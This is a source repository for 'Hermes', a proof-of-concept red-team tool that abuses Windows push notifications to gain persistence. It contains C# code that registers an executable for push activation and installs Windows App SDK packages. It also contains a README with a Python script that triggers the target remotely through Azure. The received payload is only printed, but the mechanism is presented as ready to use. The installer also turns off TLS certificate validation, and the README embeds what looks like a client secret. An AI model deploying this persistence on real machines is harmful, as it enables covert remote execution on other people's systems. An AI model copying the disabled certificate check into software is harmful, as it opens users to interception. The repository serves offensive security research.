├── .gitignore ├── README.md ├── hermes.sln └── hermes ├── Program.cs ├── Properties └── launchSettings.json ├── app.manifest └── hermes.csproj /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio 6 auto-generated project file (contains which files were open etc.) 298 | *.vbp 299 | 300 | # Visual Studio 6 workspace and project file (working project files containing files to include in project) 301 | *.dsw 302 | *.dsp 303 | 304 | # Visual Studio 6 technical files 305 | *.ncb 306 | *.aps 307 | 308 | # Visual Studio LightSwitch build output 309 | **/*.HTMLClient/GeneratedArtifacts 310 | **/*.DesktopClient/GeneratedArtifacts 311 | **/*.DesktopClient/ModelManifest.xml 312 | **/*.Server/GeneratedArtifacts 313 | **/*.Server/ModelManifest.xml 314 | _Pvt_Extensions 315 | 316 | # Paket dependency manager 317 | .paket/paket.exe 318 | paket-files/ 319 | 320 | # FAKE - F# Make 321 | .fake/ 322 | 323 | # CodeRush personal settings 324 | .cr/personal 325 | 326 | # Python Tools for Visual Studio (PTVS) 327 | __pycache__/ 328 | *.pyc 329 | 330 | # Cake - Uncomment if you are using it 331 | # tools/** 332 | # !tools/packages.config 333 | 334 | # Tabs Studio 335 | *.tss 336 | 337 | # Telerik's JustMock configuration file 338 | *.jmconfig 339 | 340 | # BizTalk build output 341 | *.btp.cs 342 | *.btm.cs 343 | *.odx.cs 344 | *.xsd.cs 345 | 346 | # OpenCover UI analysis results 347 | OpenCover/ 348 | 349 | # Azure Stream Analytics local run output 350 | ASALocalRun/ 351 | 352 | # MSBuild Binary and Structured Log 353 | *.binlog 354 | 355 | # NVidia Nsight GPU debugger configuration file 356 | *.nvuser 357 | 358 | # MFractors (Xamarin productivity tool) working folder 359 | .mfractor/ 360 | 361 | # Local History for Visual Studio 362 | .localhistory/ 363 | 364 | # Visual Studio History (VSHistory) files 365 | .vshistory/ 366 | 367 | # BeatPulse healthcheck temp database 368 | healthchecksdb 369 | 370 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 371 | MigrationBackup/ 372 | 373 | # Ionide (cross platform F# VS Code tools) working folder 374 | .ionide/ 375 | 376 | # Fody - auto-generated XML schema 377 | FodyWeavers.xsd 378 | 379 | # VS Code files for those working on multiple tools 380 | .vscode/* 381 | !.vscode/settings.json 382 | !.vscode/tasks.json 383 | !.vscode/launch.json 384 | !.vscode/extensions.json 385 | *.code-workspace 386 | 387 | # Local History for Visual Studio Code 388 | .history/ 389 | 390 | # Windows Installer files from build outputs 391 | *.cab 392 | *.msi 393 | *.msix 394 | *.msm 395 | *.msp 396 | 397 | # JetBrains Rider 398 | *.sln.iml 399 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hermes the messenger 2 | A PoC for achieving persistence via push notifications on Windows 3 | 4 | For more technical details and background read our blogpost here: https://www.persistent-security.net/post/beacon-on-demand-abusing-push-notifications-for-persistence 5 | 6 | 7 | 8 | # Usage 9 | 10 | Before anything else you need to [setup Azure](https://learn.microsoft.com/en-us/windows/apps/windows-app-sdk/notifications/push-notifications/push-quickstart#step-1-create-an-aad-app-registration). You then need to run the executable once in order to register itself for push notifications. You only need to pass the object id of your Azure app as an argument and if all goes well, it will print the channel Uri as received by Microsoft. At that stage you may close the app. 11 | 12 | ``` 13 | hermes.exe 14 | ``` 15 | 16 | If SDK 1.3 is not installed, the binary will attempt to deploy it along with the necessary extensions. 17 | 18 | When you have the channel Uri, you can attempt to spawn your executable remotely from another machine by calling the notification API with your tenant's details, and watch the magic happen: 19 | 20 | ```python 21 | import requests 22 | 23 | secret = "4r8Q~XW6U_PmJYg6Eu_jV22DWlsnhyJBIrdpV" 24 | app_id = "CA899E11-71CF-4DB3-962C-0EA65151C132" #not the object id but the Azure app id 25 | tenant_id = "E83F2382-F012-475A-9A4C-30545F429FB7" 26 | channel_uri = "https://wns2-am3p.notify.windows.com/?token=AwYAAAAiYI4p...." 27 | 28 | def send_notification(secret, app_id, tenant_id, channel_uri, notification_data): 29 | # Acquire token 30 | url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token" 31 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 32 | data = { 33 | 'grant_type': 'client_credentials', 34 | 'client_id': app_id, 35 | 'client_secret': secret, 36 | 'scope': 'https://wns.windows.com/.default' 37 | } 38 | response = requests.post(url, headers=headers, data=data) 39 | response_json = response.json() 40 | token = response_json['access_token'] 41 | 42 | # Send notification 43 | headers = { 44 | 'Content-Type': 'application/octet-stream', 45 | 'Authorization': f'Bearer {token}', 46 | 'X-WNS-Type': 'wns/raw', 47 | } 48 | response = requests.post(channel_uri, headers=headers, data=notification_data) 49 | return response.status_code, response.text 50 | 51 | 52 | send_notification(secret, app_id, tenant_id, channel_uri, "This is a notification") 53 | ``` 54 | 55 | # Demo 56 | 57 | 58 | 59 | https://github.com/persistent-security/hermes-the-messenger/assets/134269747/1de3afdc-79dc-4de6-827b-6acba44f910b 60 | 61 | -------------------------------------------------------------------------------- /hermes.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.5.33516.290 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "hermes", "hermes\hermes.csproj", "{C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|x64.ActiveCfg = Debug|x64 19 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|x64.Build.0 = Debug|x64 20 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|x64.ActiveCfg = Release|x64 23 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {0BC99F31-52EF-4835-BDEA-05BCBEA36B6A} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /hermes/Program.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Windows.PushNotifications; 2 | using Microsoft.Windows.ApplicationModel.DynamicDependency; 3 | using Windows.Management.Deployment; 4 | using System.Runtime.InteropServices; 5 | using Microsoft.Win32.SafeHandles; 6 | using System.IO.Compression; 7 | using Microsoft.Windows.AppLifecycle; 8 | using WinRT; 9 | using System.Text; 10 | using Windows.ApplicationModel.Activation; 11 | 12 | namespace hermes 13 | { 14 | internal class Program 15 | { 16 | static string _VERSION_ = "1.0.0"; 17 | [DllImport("kernel32")] 18 | public static extern IntPtr GetProcAddress(SafeLibraryHandle hModule, String procname); 19 | [DllImport("kernel32", CharSet = CharSet.Auto, BestFitMapping = false, SetLastError = true)] 20 | public static extern SafeLibraryHandle LoadLibrary(string fileName); 21 | 22 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 23 | delegate int MddBootstrapInitialize3(uint majorMinorVersion, string versionTag, PackageVersion packageVersion, Bootstrap.InitializeOptions options); 24 | private static MddBootstrapInitialize3 InitBootstrap; 25 | 26 | private static string SDK12URL = "https://aka.ms/windowsappsdk/1.2/1.2.230313.1/Microsoft.WindowsAppRuntime.Redist.1.2.zip"; 27 | private static string SDK13URL = "https://aka.ms/windowsappsdk/1.3/1.3.230502000/Microsoft.WindowsAppRuntime.Redist.1.3.zip"; 28 | 29 | private static Guid azureAppGuid; 30 | 31 | 32 | static async Task Main() 33 | { 34 | Console.WriteLine("|-----------------------------------------------|"); 35 | Console.WriteLine("| Persistent Security Industries GmbH |"); 36 | Console.WriteLine($"| Persistence via push notifications PoC v{_VERSION_} |"); 37 | Console.WriteLine("|-----------------------------------------------|\n"); 38 | 39 | if (!await CheckDependenciesAsync()) 40 | { 41 | Console.WriteLine("[+] Dependencies failed."); 42 | return; 43 | } 44 | 45 | if (!PushNotificationManager.IsSupported()) 46 | { 47 | Console.WriteLine("[+] Push notifications are not supported."); 48 | return; 49 | } 50 | Console.WriteLine("[+] Push notifications are supported."); 51 | 52 | var activationArguments = AppInstance.GetCurrent().GetActivatedEventArgs(); 53 | object activatedEventArgs; 54 | string lastArg; 55 | 56 | switch (activationArguments.Kind) 57 | { 58 | case ExtendedActivationKind.CommandLineLaunch: 59 | activatedEventArgs = activationArguments.Data.As(); 60 | lastArg = ((ICommandLineActivatedEventArgs)activatedEventArgs).Operation.Arguments.Split().Last().Replace("\"", ""); 61 | break; 62 | case ExtendedActivationKind.Launch: 63 | activatedEventArgs = activationArguments.Data.As(); 64 | lastArg = ((ILaunchActivatedEventArgs)activatedEventArgs).Arguments.Split().Last().Replace("\"", ""); 65 | break; 66 | case ExtendedActivationKind.Push: 67 | PushNotificationReceivedEventArgs pushArgs = activationArguments.Data.As(); 68 | var deferral = pushArgs.GetDeferral(); 69 | var notificationPayload = Encoding.UTF8.GetString(pushArgs.Payload); 70 | DoSomething(notificationPayload); 71 | Console.WriteLine("Press any key to exit"); 72 | Console.ReadKey(); 73 | deferral.Complete(); 74 | return; 75 | default: 76 | Console.WriteLine("[-] Invalid activation event"); 77 | return; 78 | } 79 | 80 | if (!Guid.TryParse(lastArg, out azureAppGuid)) 81 | { 82 | Console.WriteLine("[-] Invalid Guid. Enter a valid Object Id."); 83 | Console.WriteLine("Usage: hermes.exe "); 84 | return; 85 | } 86 | Console.WriteLine($"[+] Using object (app) id: {azureAppGuid}"); 87 | 88 | try 89 | { 90 | var manager = PushNotificationManager.Default; 91 | manager.Register(); 92 | 93 | var ch = await manager.CreateChannelAsync(azureAppGuid); 94 | 95 | Console.WriteLine("\n" + ch.Channel.Uri); 96 | } 97 | catch (Exception e) 98 | { 99 | Console.WriteLine(e.ToString()); 100 | } 101 | Console.WriteLine("Press any key to exit"); 102 | Console.ReadKey(true); 103 | //MddBootstrapShutdown(); 104 | } 105 | 106 | 107 | static bool Init(string bootstrapPath) 108 | { 109 | uint[] versions = { 0x00010003, 0x00010002, 0x00010001 }; 110 | Console.WriteLine("[+] Loading bootstrap dll from: " + Path.Combine(bootstrapPath, "Microsoft.WindowsAppRuntime.Bootstrap.dll")); 111 | var h = LoadLibrary(Path.Combine(bootstrapPath, "Microsoft.WindowsAppRuntime.Bootstrap.dll")); 112 | 113 | if (h == null) 114 | { 115 | Console.WriteLine("[-] Failed to load bootstrap dll."); 116 | return false; 117 | } 118 | var addr = GetProcAddress(h, "MddBootstrapInitialize2"); 119 | 120 | 121 | if (h.IsInvalid) 122 | { 123 | int hr = Marshal.GetHRForLastWin32Error(); 124 | Marshal.ThrowExceptionForHR(hr); 125 | Console.WriteLine("[-] Bootstrap DLL not loaded correctly"); 126 | return false; 127 | } 128 | else 129 | { 130 | Console.WriteLine("[+] Bootstrap DLL loaded correctly"); 131 | if (addr == IntPtr.Zero) 132 | { 133 | Console.WriteLine("[-] MddBootstrapInitialize2 was not found"); 134 | return false; 135 | } 136 | InitBootstrap = (MddBootstrapInitialize3)Marshal.GetDelegateForFunctionPointer(addr, typeof(MddBootstrapInitialize3)); 137 | } 138 | 139 | foreach (uint version in versions) 140 | { 141 | try 142 | { 143 | Marshal.ThrowExceptionForHR(InitBootstrap(version, null, default, Bootstrap.InitializeOptions.None)); 144 | Console.WriteLine($"[+] Initialized SDK Version 0x{version:X}"); 145 | return true; 146 | } 147 | catch (Exception ex) 148 | { 149 | Console.WriteLine(ex.ToString()); 150 | continue; 151 | } 152 | } 153 | return false; 154 | } 155 | 156 | static async Task InstallPackageAsync(string url, bool runtime = false, bool main_ = false, bool ddl = false, bool singleton = false) 157 | { 158 | var packageUri = new Uri(url); 159 | var packageManager = new PackageManager(); 160 | 161 | System.Net.WebProxy webProxy = new System.Net.WebProxy 162 | { 163 | UseDefaultCredentials = true, 164 | Address = HttpClient.DefaultProxy.GetProxy(packageUri) 165 | }; 166 | try 167 | { 168 | var httpClientHandler = new HttpClientHandler 169 | { 170 | Proxy = webProxy, 171 | ServerCertificateCustomValidationCallback = HttpClientHandler.DangerousAcceptAnyServerCertificateValidator 172 | }; 173 | 174 | using (var client = new HttpClient(httpClientHandler)) 175 | { 176 | var data = await client.GetByteArrayAsync(url); 177 | 178 | using (var memoryStream = new MemoryStream(data)) 179 | { 180 | using (var archive = new ZipArchive(memoryStream)) 181 | { 182 | foreach (var entry in archive.Entries) 183 | { 184 | if (entry.FullName.StartsWith("MSIX/win10-x64", StringComparison.OrdinalIgnoreCase) && entry.FullName.EndsWith(".msix", StringComparison.OrdinalIgnoreCase)) 185 | { 186 | if ((runtime && entry.Name.StartsWith("Microsoft.WindowsAppRuntime")) || 187 | (main_ && entry.Name.StartsWith("Microsoft.WindowsAppRuntime.Main")) || 188 | (ddl && entry.Name.StartsWith("Microsoft.WindowsAppRuntime.DDLM")) || 189 | (singleton && entry.Name.StartsWith("Microsoft.WindowsAppRuntime.Singleton"))) 190 | { 191 | Console.WriteLine($"[+] Installing {entry.FullName}"); 192 | var tempFilePath = Path.GetTempFileName() + ".msix"; 193 | 194 | try 195 | { 196 | using (var fileStream = File.OpenWrite(tempFilePath)) 197 | using (var entryStream = entry.Open()) 198 | { 199 | await entryStream.CopyToAsync(fileStream); 200 | } 201 | var deploymentOperation = await packageManager.AddPackageAsync(new Uri(tempFilePath), null, DeploymentOptions.None); 202 | 203 | Console.WriteLine($"[+] Package installed: {deploymentOperation.IsRegistered}"); 204 | } 205 | catch (Exception ex) 206 | { 207 | Console.WriteLine(ex.Message); 208 | File.Delete(tempFilePath); 209 | continue; 210 | } 211 | finally 212 | { 213 | File.Delete(tempFilePath); 214 | } 215 | } 216 | } 217 | } 218 | } 219 | } 220 | } 221 | 222 | } 223 | catch (Exception ex) 224 | { 225 | Console.WriteLine(ex.Message); 226 | } 227 | return true; 228 | } 229 | 230 | 231 | static Windows.ApplicationModel.Package[] GetAppRuntimeVersions() 232 | { 233 | var packageManager = new PackageManager(); 234 | string installationPath = string.Empty; 235 | Windows.ApplicationModel.Package[] frameworks = Array.Empty(); 236 | 237 | foreach (var package in packageManager.FindPackagesForUser(string.Empty)) 238 | { 239 | //if ((package.Id.FamilyName == "Microsoft.WindowsAppRuntime.1.3_8wekyb3d8bbwe" || package.Id.FamilyName == "Microsoft.WindowsAppRuntime.1.2_8wekyb3d8bbwe") 240 | // && package.Id.Architecture == Windows.System.ProcessorArchitecture.X64) 241 | 242 | // Search only SDK 1.3 for now. It's more reliable. 243 | if (package.Id.FamilyName == "Microsoft.WindowsAppRuntime.1.3_8wekyb3d8bbwe" && package.Id.Architecture == Windows.System.ProcessorArchitecture.X64) 244 | { 245 | Console.WriteLine($"[+] Found {package.Id.FamilyName}"); 246 | frameworks = frameworks.Append(package).ToArray(); 247 | } 248 | } 249 | 250 | return frameworks; 251 | } 252 | 253 | static async Task CheckDependenciesAsync() 254 | { 255 | bool foundDDL12 = false; 256 | bool foundSingleton12 = false; 257 | bool foundDDL13 = false; 258 | bool foundSingleton13 = false; 259 | string version = "0000"; 260 | Windows.ApplicationModel.Package[] frameworks = GetAppRuntimeVersions(); 261 | 262 | if (frameworks.Length == 0) 263 | { 264 | Console.WriteLine("[-] No compatible frameworks are installed. Attempting to deploy one."); 265 | return await InstallPackageAsync(SDK13URL, true, true, true, true); 266 | } 267 | else 268 | { 269 | var packageManager = new PackageManager(); 270 | 271 | foreach (var package in packageManager.FindPackagesForUser(string.Empty)) 272 | { 273 | if (package.Id.FamilyName.StartsWith("Microsoft.WinAppRuntime.DDLM") && package.Id.Architecture == Windows.System.ProcessorArchitecture.X64) 274 | { 275 | foreach (var framework in frameworks) 276 | { 277 | foreach (var dependency in package.Dependencies) 278 | { 279 | if (dependency.Id.FamilyName == framework.Id.FamilyName) 280 | { 281 | if (framework.Id.FamilyName == "Microsoft.WindowsAppRuntime.1.3_8wekyb3d8bbwe") 282 | { 283 | foundDDL13 = true; 284 | Console.WriteLine("[+] DDL 1.3 is already installed."); 285 | continue; 286 | } 287 | if (framework.Id.FamilyName == "Microsoft.WindowsAppRuntime.1.2_8wekyb3d8bbwe") 288 | { 289 | foundDDL12 = true; 290 | Console.WriteLine("[+] DDL 1.2 is already installed."); 291 | continue; 292 | } 293 | } 294 | } 295 | } 296 | } 297 | if (package.Id.FamilyName.StartsWith("MicrosoftCorporationII.WinAppRuntime.Singleton") && package.Id.Architecture == Windows.System.ProcessorArchitecture.X64) 298 | { 299 | foreach (var framework in frameworks) 300 | { 301 | foreach (var dependency in package.Dependencies) 302 | { 303 | if (dependency.Id.FamilyName == framework.Id.FamilyName) 304 | { 305 | if (framework.Id.FamilyName == "Microsoft.WindowsAppRuntime.1.3_8wekyb3d8bbwe") 306 | { 307 | foundSingleton13 = true; 308 | Console.WriteLine("[+] Singleton 1.3 is already installed."); 309 | continue; 310 | } 311 | if (framework.Id.FamilyName == "Microsoft.WindowsAppRuntime.1.2_8wekyb3d8bbwe") 312 | { 313 | foundSingleton12 = true; 314 | Console.WriteLine("[+] Singleton 1.2 is already installed."); 315 | continue; 316 | } 317 | } 318 | } 319 | } 320 | } 321 | } 322 | 323 | if ((foundDDL12 && foundSingleton12) || (foundDDL13 && foundSingleton13)) 324 | { 325 | version = foundDDL13 && foundSingleton13 ? "1.3" : "1.2"; 326 | Console.WriteLine($"[+] Found compatible framework version {(foundDDL13 && foundSingleton13 ? 1.3 : 1.2)}"); 327 | 328 | foreach (var framework in frameworks) 329 | { 330 | if (framework.Id.FamilyName.Contains(version)) 331 | { 332 | return Init(framework.InstalledPath); 333 | } 334 | } 335 | } 336 | 337 | foreach (var framework in frameworks) 338 | { 339 | if (framework.Id.FamilyName.Contains("1.2")) 340 | { 341 | await InstallPackageAsync(SDK12URL, false, false, !foundDDL12, !foundSingleton12); 342 | return Init(framework.InstalledPath); 343 | } 344 | 345 | if (framework.Id.FamilyName.Contains("1.3")) 346 | { 347 | await InstallPackageAsync(SDK13URL, false, false, !foundDDL13, !foundSingleton13); 348 | return Init(framework.InstalledPath); 349 | } 350 | } 351 | } 352 | 353 | return false; 354 | } 355 | 356 | 357 | static void DoSomething(string payload) 358 | { 359 | Console.WriteLine($"[+] Received push notification content in the background: \n\n{payload}\n"); 360 | return; 361 | } 362 | } 363 | 364 | sealed class SafeLibraryHandle : SafeHandleZeroOrMinusOneIsInvalid 365 | { 366 | [DllImport("kernel32", SetLastError = true)] 367 | [return: MarshalAs(UnmanagedType.Bool)] 368 | public static extern bool FreeLibrary(IntPtr hModule); 369 | private SafeLibraryHandle() : base(true) { } 370 | 371 | protected override bool ReleaseHandle() 372 | { 373 | return FreeLibrary(handle); 374 | } 375 | } 376 | } -------------------------------------------------------------------------------- /hermes/Properties/launchSettings.json: -------------------------------------------------------------------------------- 1 | { 2 | "profiles": { 3 | "messenger": { 4 | "commandName": "Project", 5 | "nativeDebugging": true 6 | } 7 | } 8 | } -------------------------------------------------------------------------------- /hermes/app.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 54 | 62 | 63 | 64 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /hermes/hermes.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | net6.0-windows10.0.19041.0 6 | enable 7 | enable 8 | app.manifest 9 | 10 | AnyCPU;x64 11 | 10.0.19041.0 12 | 13 | 14 | 15 | true 16 | 17 | 18 | 19 | 10 20 | true 21 | 10.0.19041.0 22 | 23 | 24 | 25 | 26 | CppwinrtComponent; 27 | Microsoft.Windows.PushNotifications; 28 | Microsoft.Windows.ApplicationModel.DynamicDependency; 29 | Windows.Management.Deployment; 30 | Microsoft.Windows.ApplicationModel; 31 | Microsoft.Windows.ApplicationModel.WindowsAppRuntime; 32 | Windows.Foundation; 33 | 34 | True 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | --------------------------------------------------------------------------------